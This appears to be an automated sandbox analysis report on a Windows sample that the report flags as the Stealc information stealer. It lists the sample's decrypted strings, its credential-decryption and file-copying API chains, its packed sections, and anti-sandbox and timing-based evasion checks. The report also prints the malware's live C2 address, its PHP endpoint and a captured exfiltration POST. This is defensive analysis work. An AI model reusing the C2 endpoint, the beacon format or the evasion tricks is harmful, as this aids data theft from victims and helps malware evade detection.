                Source: 0.2.file.exe.680000.0.unpackString decryptor: hwid
                Source: 0.2.file.exe.680000.0.unpackString decryptor: build
                Source: 0.2.file.exe.680000.0.unpackString decryptor: token
                Source: 0.2.file.exe.680000.0.unpackString decryptor: file_name
                Source: 0.2.file.exe.680000.0.unpackString decryptor: file
                Source: 0.2.file.exe.680000.0.unpackString decryptor: message
                Source: 0.2.file.exe.680000.0.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                Source: 0.2.file.exe.680000.0.unpackString decryptor: screenshot.jpg
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00699030 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00699030
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068A210 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_0068A210
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006872A0 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_006872A0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068A2B0 CryptUnprotectData,LocalAlloc,LocalFree,0_2_0068A2B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068C920 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0068C920
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.2089126694.000000000504B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.2089126694.000000000504B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006940F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_006940F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0068E530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00681710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00681710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006947C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_006947C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0068F7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00694B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00694B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00693B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00693B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0068DB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0068BE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0068EE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0068DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0068DF10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.206:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.206/6c4adf523b719729.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHDHIDAEHCFHJJJJECAHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 44 30 43 38 32 34 46 37 31 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 2d 2d 0d 0a Data Ascii: ------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="hwid"9D0C824F71144293944220------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="build"tale------KEHDHIDAEHCFHJJJJECA--
                Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006862D0 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_006862D0
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /6c4adf523b719729.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHDHIDAEHCFHJJJJECAHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 44 30 43 38 32 34 46 37 31 31 34 34 32 39 33 39 34 34 32 32 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 2d 2d 0d 0a Data Ascii: ------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="hwid"9D0C824F71144293944220------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="build"tale------KEHDHIDAEHCFHJJJJECA--
                Source: file.exe, 00000000.00000002.2132664415.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
                Source: file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2132664415.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                Source: file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/0
                Source: file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                Source: file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
                Source: file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpN
                Source: file.exe, 00000000.00000002.2132664415.0000000001482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpfh
                Source: file.exe, 00000000.00000002.2132664415.0000000001469000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpz
                Source: file.exe, file.exe, 00000000.00000003.2089126694.000000000504B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C00980_2_006C0098
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B21380_2_006B2138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DB1980_2_006DB198
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B4E14B0_2_00B4E14B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006EE2580_2_006EE258
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0099720E0_2_0099720E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C42880_2_006C4288
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009EF3C00_2_009EF3C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD73CB0_2_00AD73CB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0070B3080_2_0070B308
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ADC3050_2_00ADC305
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FD39E0_2_006FD39E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C94890_2_009C9489
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A45730_2_006A4573
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006AE5440_2_006AE544
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C45A80_2_006C45A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006ED5A80_2_006ED5A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FA6480_2_006FA648
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007096FD0_2_007096FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C66C80_2_006C66C8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AA66450_2_00AA6645
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DD7200_2_006DD720
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F67990_2_006F6799
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D48680_2_006D4868
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009E88CB0_2_009E88CB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006EF8D60_2_006EF8D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A3281C0_2_00A3281C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DB8A80_2_006DB8A8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ADA86A0_2_00ADA86A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D98B80_2_006D98B8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A979D60_2_00A979D6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AE1A030_2_00AE1A03
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A94BD30_2_00A94BD3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E8BD90_2_006E8BD9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F4BA80_2_006F4BA8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F0B880_2_006F0B88
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006FAC280_2_006FAC28
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA7C2A0_2_00BA7C2A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_009C1C090_2_009C1C09
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DBD680_2_006DBD68
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006B1D780_2_006B1D78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AD8D990_2_00AD8D99
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006EAD380_2_006EAD38
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D4DC80_2_006D4DC8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B9FD7B0_2_00B9FD7B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D5DB90_2_006D5DB9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C8E780_2_006C8E78
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ADDE9C0_2_00ADDE9C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006F1EE80_2_006F1EE8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AEBFDB0_2_00AEBFDB
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B6AF6E0_2_00B6AF6E
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00684610 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: fozyxqhw ZLIB complexity 0.9946884020814342
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00699790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00699790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00693970 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00693970
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\3TZGWVHC.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 2123776 > 1048576
                Source: file.exeStatic PE information: Raw size of fozyxqhw is bigger than: 0x100000 < 0x19b600
                Source: Binary string: my_library.pdbU source: file.exe, 00000000.00000003.2089126694.000000000504B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp
                Source: Binary string: my_library.pdb source: file.exe, file.exe, 00000000.00000003.2089126694.000000000504B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.680000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fozyxqhw:EW;gnsdcfju:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fozyxqhw:EW;gnsdcfju:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00699BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00699BB0
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x215498 should be: 0x20f1cd
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: fozyxqhw
                Source: file.exeStatic PE information: section name: gnsdcfju
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BC20AC push eax; mov dword ptr [esp], ebp0_2_00BC2165
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AED0FE push 4AA7AFC2h; mov dword ptr [esp], edi0_2_00AED150
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AED0FE push 27CE0C78h; mov dword ptr [esp], ecx0_2_00AED17E
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC10CB push 6604EB85h; mov dword ptr [esp], eax0_2_00AC10F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC10CB push 2A19899Eh; mov dword ptr [esp], ebx0_2_00AC112A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC10CB push 657E7F5Eh; mov dword ptr [esp], eax0_2_00AC1138
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC10CB push edi; mov dword ptr [esp], esi0_2_00AC1163
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC10CB push 463A6754h; mov dword ptr [esp], edx0_2_00AC11CA
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00AC10CB push edx; mov dword ptr [esp], 3C1F67F5h0_2_00AC11D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DA2042 push edx; mov dword ptr [esp], eax0_2_00DA20BD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DA2042 push edx; mov dword ptr [esp], 00001000h0_2_00DA20CE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DA2042 push ecx; mov dword ptr [esp], ebx0_2_00DA20DF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DA2042 push ebx; mov dword ptr [esp], 77F30161h0_2_00DA20F8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DA2042 push edi; mov dword ptr [esp], 5FBD8444h0_2_00DA211F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF4022 push 7E246A93h; mov dword ptr [esp], ebp0_2_00BF3F57
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAC005 push edi; mov dword ptr [esp], edx0_2_00BAC6FF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BF3072 push 2679ED87h; mov dword ptr [esp], edx0_2_00BF30A1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5D068 push 633BB1C2h; mov dword ptr [esp], ecx0_2_00B5D10C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5D068 push ebp; mov dword ptr [esp], edi0_2_00B5D125
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA7192 push eax; mov dword ptr [esp], esi0_2_00BA71FD
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B031F1 push eax; mov dword ptr [esp], ecx0_2_00B0322C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B031F1 push 1E9AC6AAh; mov dword ptr [esp], edx0_2_00B03279
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DA21B7 push edi; mov dword ptr [esp], esp0_2_00DA21C4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DA21B7 push ebx; mov dword ptr [esp], 7F9BAFF6h0_2_00DA21D8
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DA21B7 push eax; mov dword ptr [esp], ecx0_2_00DA221B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00DA21B7 push ecx; mov dword ptr [esp], 6F55E5AAh0_2_00DA2225
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0613E push edi; mov dword ptr [esp], 199F7ED6h0_2_00A061A3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A0613E push 7533DAF5h; mov dword ptr [esp], ecx0_2_00A061BC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5D17C push ebp; mov dword ptr [esp], esi0_2_00A5D2C4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00A5D17C push eax; mov dword ptr [esp], edx0_2_00A5D2D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B4E14B push 2D004818h; mov dword ptr [esp], ebx0_2_00B4E171
                Source: file.exeStatic PE information: section name: fozyxqhw entropy: 7.952608283646461

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00699BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00699BB0

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-38006
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE7CB8 second address: AE7CCD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE7CCD second address: AE7CF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8838h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jnl 00007F0AD95F8826h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6DAE second address: AE6DB8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0AD8C6A9C2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6DB8 second address: AE6DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6DBE second address: AE6DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0AD8C6A9C8h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6DDF second address: AE6DE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6DE3 second address: AE6DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F0AD8C6A9C2h 0x0000000e ja 00007F0AD8C6A9B6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE70EE second address: AE70F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE70F2 second address: AE7102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F0AD8C6A9BCh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE7102 second address: AE7128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F0AD95F884Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0AD95F8839h 0x00000012 rdtsc
